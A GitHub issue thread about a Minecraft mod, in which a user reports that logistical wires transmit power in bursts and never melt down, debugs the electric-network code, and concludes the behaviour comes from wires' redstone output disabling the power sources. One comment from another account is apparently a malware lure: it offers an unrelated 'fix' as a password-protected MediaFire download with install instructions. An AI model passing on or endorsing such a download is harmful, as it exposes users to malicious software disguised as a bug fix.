### ISSUE TITLE
Logistical wires send power in bursts, which makes them effectively never meltdown

### ISSUE THREAD

**Issue by 9thCore** [Aurilisdev/Physica#272]
Repro:
1. Add a power source which outputs a lot of power
2. Add a potentiometer or a battery
3. Connect with any non-logistical wire besides superconductive (as it never melts down)
4. Wire ampacity too low, so it melts down
5. Repeat 3. with any logistical wire besides superconductive
6. Notice how power only gets transferred in short bursts (presumably because of block state updates related to its `LIT` property; looks like current only goes through when off?), which prevents a meltdown entirely

Video:
https://github.com/user-attachments/assets/fc65b090-edab-4e88-829f-779adf4a4a14

Technical data:
Minecraft 1.20.1
Forge 47.3.1
Electrodynamics 1.20.1-0.9.1-0

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by 9thCore** [comment]
Tinkered around and debugged for a bit (read: a few hours) and I've narrowed the issue down to logistical wires _specifically_ directly connected to the producer being the culprit and not letting any power flow out.
Wires in-between don't impact anything but letting redstone get energy, and wires directly connected to the receiver have no special impact either.
It seems that while the logistical wire is on, `voltage` is set to 0, so [`ElectricNetwork#sendToReceivers`](https://github.com/aurilisdev/Electrodynamics/blob/1.20/src/main/java/electrodynamics/common/network/type/ElectricNetwork.java#L115) is never called (see `if` block it's in). The reason for which I'm still trying to grasp, however
(is behaviour intended, after all? seems like odd logic, given that its neither documented in the guidebook nor makes much logical sense as we already have the relay which can block electricity flow)

**Comment by 9thCore** [comment]
i figured it out. was not a bug after all, is a combination of multiple factors
1. the sources i'd tested get disabled by any amount of redstone current
2. logistical wires output 15 redstone current in every direction
3. while the sources are disabled, no power is transmitted out, so the logistical wire eventually turns off as it re-reads the current being transmitted over the network
4. rinse and repeat
